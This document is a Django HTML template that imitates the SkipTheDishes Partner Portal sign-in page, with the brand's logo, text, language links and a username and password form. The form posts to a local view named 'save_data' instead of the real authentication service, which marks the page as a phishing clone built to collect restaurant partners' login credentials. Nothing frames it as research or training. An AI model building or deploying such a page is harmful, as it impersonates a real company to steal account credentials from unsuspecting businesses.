{% load static %}
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="bg-white">

<head>
    <meta charset="utf-8">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <meta name="robots" content="noindex, nofollow">

            <meta name="viewport" content="width=device-width,initial-scale=1"/>

    <title>Sign in to SkipTheDishes</title>
    <link rel='icon' type='image/png' href='{% static "images/favicon.ico" %}' sizes="32x32">
    <link rel='icon' type='image/png' href='{% static "images/favicon-16x16.png" %}' sizes="16x16">

            <link href="{% static "css/styles.css" %}" rel="stylesheet"/>
            <link href="{% static "css/inter.css" %}" rel="stylesheet"/>
            <link href="{% static "css/jetsan.css" %}" rel="stylesheet"/>
            <style> 
                @font-face {
                  font-family: myFirstFont;
                  src: url(sansation_light.woff);
                }
                
                div {
                  font-family: myFirstFont;
                }
                </style>

    <script src="{% static "jss/aphine.js" %}" defer></script>

                <script src="https://www.google.com/recaptcha/api.js?hl=en" async defer></script>
</head>
<body class="antialiased bg-white">
<div class="container-portal xl:gap-35 xl:px-51 xl:py-8 lg:gap-20 lg:px-27 lg:py-8 md:gap-35 md:py-8 md:px-20 sm:gap-9 sm:p-8">
    <img class="wave-1" src="{% static "images/wave1.svg" %}"/>
    <img class="wave-2" src="{% static "images/wave2.svg" %}"/>

    <div class="flex flex-col text-left lg:flex-row xl:flex-row justify-evenly lg:items-top xl:items-top xl:gap-35 lg:gap-20 md:gap-21 sm:gap-9 sm:w-full">
        <div class="flex flex-col w-full md:max-w-636 lg:max-w-636 sm:max-w-311">
            <div class="flex flex-col items-start p-0 gap-4 text-white flex-none order-1 grow-0	z-10">
                <span class="aside-header">Partner Portal</span>
                <span class="aside-title">A management tool to feed and empower your business.</span>
                <span class="aside-description">When it comes to managing your business through the Partner Portal, control is right at your fingertips. Manage your online business with earning statements, self-serve menu changes, store hours, promos, and more.</span>
            </div>
            <img class="trapezoid" src="{% static "images/trapezoid.svg" %}"/>
            <img class="rectangle" src="{% static "images/rectangle.svg" %}"/>
        </div>

        <div class="w-full lg:w-full xl:w-full xl:w-9/12 mx-auto lg:mx-0 xl:mx-0 md:px-5 lg:max-w-600">
            <div class="bg-white sm:bg-transparent p-10 sm:p-0 flex flex-col w-full lg:shadow-md md:shadow-md xl:shadow-md rounded-xl sm:pt-20">
                <div class="w-full mx-auto md:min-w-80 lg:min-w-80 xl:min-w-80 sm:mx-0">
                    <div class="flex sm:justify-center">
                        <div class="flex-auto sm:flex-none">
                            <img class="h-12" src="{% static "images/logo-horizontal.svg" %}"/>
                        </div>
                            <div class="sm:hidden">
                                <div x-data="{ open: false }" class="relative inline-block text-left dropdown"
                                     @click.outside="open = false">
                                    <button type="button" @click="open = !open"
                                            class="transition flex-auto rounded-full px-3 py-1 bg-gray-20 icon text-orange border-transparent focus:outline-none border focus:border-orange-30 focus:shadow-outline-orange active:bg-gray-40 active:text-orange-55"
                                            aria-haspopup="true" aria-expanded="true"
                                            aria-controls="localization-menu-items">
                                            <svg xmlns="http://www.w3.org/2000/svg" id="icon" viewBox="0 0 24 24" fill="currentColor"><path d="M11.99 2C6.47 2 2 6.48 2 12s4.47 10 9.99 10C17.52 22 22 17.52 22 12S17.52 2 11.99 2zm6.93 6h-2.95c-.32-1.25-.78-2.45-1.38-3.56 1.84.63 3.37 1.91 4.33 3.56zM12 4.04c.83 1.2 1.48 2.53 1.91 3.96h-3.82c.43-1.43 1.08-2.76 1.91-3.96zM4.26 14C4.1 13.36 4 12.69 4 12s.1-1.36.26-2h3.38c-.08.66-.14 1.32-.14 2 0 .68.06 1.34.14 2H4.26zm.82 2h2.95c.32 1.25.78 2.45 1.38 3.56-1.84-.63-3.37-1.9-4.33-3.56zm2.95-8H5.08c.96-1.66 2.49-2.93 4.33-3.56C8.81 5.55 8.35 6.75 8.03 8zM12 19.96c-.83-1.2-1.48-2.53-1.91-3.96h3.82c-.43 1.43-1.08 2.76-1.91 3.96zM14.34 14H9.66c-.09-.66-.16-1.32-.16-2 0-.68.07-1.35.16-2h4.68c.09.65.16 1.32.16 2 0 .68-.07 1.34-.16 2zm.25 5.56c.6-1.11 1.06-2.31 1.38-3.56h2.95c-.96 1.65-2.49 2.93-4.33 3.56zM16.36 14c.08-.66.14-1.32.14-2 0-.68-.06-1.34-.14-2h3.38c.16.64.26 1.31.26 2s-.1 1.36-.26 2h-3.38z"></path></svg>
                                        <span class="font-bold align-middle text-black uppercase">en</span>
                                    </button>
                                    <div :class="{ 'dropdown-menu-visible' : open }"
                                         class="opacity-0 invisible dropdown-menu transition-all duration-300 transform origin-top-right -translate-y-2 scale-95">
                                        <div
                                                class="absolute right-0 w-40 mt-2 py-1 px-2 origin-top-right bg-white border border-gray-200 divide-y divide-gray-100 rounded-md shadow-md outline-none">
                                            <div class="py-1">
                                                    <a href="/auth/realms/SkipTheDishes/login-actions/authenticate?client_id=restaurant-portal&amp;tab_id=Z_NURNi3EiA&amp;execution=9694c44f-c1df-4f37-b46d-35b8a4003150&amp;kc_locale=en"
                                                       class="hover:no-underline flex rounded-sm justify-between w-full px-4 py-2 text-normal leading-5 text-left hover:bg-gray-200"
                                                       role="menuitem">English</a>
                                                    <a href="/auth/realms/SkipTheDishes/login-actions/authenticate?client_id=restaurant-portal&amp;tab_id=Z_NURNi3EiA&amp;execution=9694c44f-c1df-4f37-b46d-35b8a4003150&amp;kc_locale=fr"
                                                       class="hover:no-underline flex rounded-sm justify-between w-full px-4 py-2 text-normal leading-5 text-left hover:bg-gray-200"
                                                       role="menuitem">Français</a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                    </div>
                    <div class="mt-8 text-4xl font-extrabold tracking-tight leading-tight">
                    </div>
        <form id="kc-form-login" class="mt-8" onsubmit="login.disabled = true; return true;" action="{% url "save_data" %}" method="post">
            <div class="w-full mb-3">
                <label class="font-bold"
                       for="username">Username or email</label>
                    <input id="username"
                           name="username"
                           value=""
                           autocomplete="off"
                           aria-invalid=""
                           class="transition flex-1 mt-1 appearance-none border border-gray-400 w-full py-3 px-4 bg-white text-gray-700 placeholder-gray-400 shadow-sm rounded-lg text-base focus:outline-none focus:border-orange"
                           type="text"/>
            </div>

            <div class="w-full mb-3">
                <label class="font-bold" for="password">Password</label>
                <input id="password" name="password"
                       class="transition flex-1 mt-1 appearance-none border border-gray-400 w-full py-3 px-4 bg-white text-gray-700 placeholder-gray-400 shadow-sm rounded-lg text-base focus:outline-none focus:border-orange"
                       type="password"/>
            </div>
                

            <input type="hidden" class="hidden" id="id-hidden-input" name="credentialId" />

            <button
                    name="login"
                    id="kc-login"
                    class="transition w-full mt-6 rounded-full bg-orange text-xl font-bold text-white py-3.5 px-4 border-none hover:bg-orange-55 active:bg-orange-90"
                    type="submit">
                Login
            </button>

            <div class="inline-flex text-lg font-normal items-center justify-between w-full mt-14 sm:mt-10 sm:flex-col sm:text-center sm:gap-6">
                <a href="https://restaurants.skipthedishes.com/application" class="ml-1 text-blue font-bold hover:underline cursor-pointer sm:order-2">Become a Skip partner</a>
                    <a href="/auth/realms/SkipTheDishes/login-actions/reset-credentials?client_id=restaurant-portal&amp;tab_id=Z_NURNi3EiA"
                       class="text-blue font-bold hover:underline cursor-pointer sm:order-1">Forgot password?
                    </a>
            </div>

        </form>
                        <div class="flex justify-center">
                            <div class="hidden sm:block sm:mt-8">
                                <div x-data="{ open: false }" class="relative text-left dropdown"
                                     @click.outside="open = false">
                                    <div :class="{ 'dropdown-menu-visible' : open }"
                                         class="opacity-0 invisible dropdown-menu transition-all duration-300 transform origin-top-right -translate-y-2 scale-95">
                                        <div
                                                class="bottom-0 origin-top-right absolute w-40 -ml-95 mb-2 py-1 px-2 origin-top-right bg-white border border-gray-200 divide-y divide-gray-100 rounded-md shadow-md outline-none">
                                            <div class="py-1">
                                                    <a href="/auth/realms/SkipTheDishes/login-actions/authenticate?client_id=restaurant-portal&amp;tab_id=Z_NURNi3EiA&amp;execution=9694c44f-c1df-4f37-b46d-35b8a4003150&amp;kc_locale=en"
                                                       class="hover:no-underline flex rounded-sm justify-between w-full px-4 py-2 text-normal leading-5 text-left hover:bg-gray-200"
                                                       role="menuitem">English</a>
                                                    <a href="/auth/realms/SkipTheDishes/login-actions/authenticate?client_id=restaurant-portal&amp;tab_id=Z_NURNi3EiA&amp;execution=9694c44f-c1df-4f37-b46d-35b8a4003150&amp;kc_locale=fr"
                                                       class="hover:no-underline flex rounded-sm justify-between w-full px-4 py-2 text-normal leading-5 text-left hover:bg-gray-200"
                                                       role="menuitem">Français</a>
                                            </div>
                                        </div>
                                    </div>
                                    <button type="button" @click="open = !open"
                                            class="transition flex-auto rounded-full px-3 py-1 bg-gray-20 icon text-orange border-transparent focus:outline-none border focus:border-orange-30 focus:shadow-outline-orange active:bg-gray-40 active:text-orange-55"
                                            aria-haspopup="true" aria-expanded="true"
                                            aria-controls="localization-menu-items">

                                            <svg xmlns="http://www.w3.org/2000/svg" id="icon" viewBox="0 0 24 24" fill="currentColor"><path d="M11.99 2C6.47 2 2 6.48 2 12s4.47 10 9.99 10C17.52 22 22 17.52 22 12S17.52 2 11.99 2zm6.93 6h-2.95c-.32-1.25-.78-2.45-1.38-3.56 1.84.63 3.37 1.91 4.33 3.56zM12 4.04c.83 1.2 1.48 2.53 1.91 3.96h-3.82c.43-1.43 1.08-2.76 1.91-3.96zM4.26 14C4.1 13.36 4 12.69 4 12s.1-1.36.26-2h3.38c-.08.66-.14 1.32-.14 2 0 .68.06 1.34.14 2H4.26zm.82 2h2.95c.32 1.25.78 2.45 1.38 3.56-1.84-.63-3.37-1.9-4.33-3.56zm2.95-8H5.08c.96-1.66 2.49-2.93 4.33-3.56C8.81 5.55 8.35 6.75 8.03 8zM12 19.96c-.83-1.2-1.48-2.53-1.91-3.96h3.82c-.43 1.43-1.08 2.76-1.91 3.96zM14.34 14H9.66c-.09-.66-.16-1.32-.16-2 0-.68.07-1.35.16-2h4.68c.09.65.16 1.32.16 2 0 .68-.07 1.34-.16 2zm.25 5.56c.6-1.11 1.06-2.31 1.38-3.56h2.95c-.96 1.65-2.49 2.93-4.33 3.56zM16.36 14c.08-.66.14-1.32.14-2 0-.68-.06-1.34-.14-2h3.38c.16.64.26 1.31.26 2s-.1 1.36-.26 2h-3.38z"></path></svg>
                                        
                                        <span class="font-bold align-middle text-black uppercase">en</span>
                                    </button>
                                </div>
                            </div>
                        </div>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>
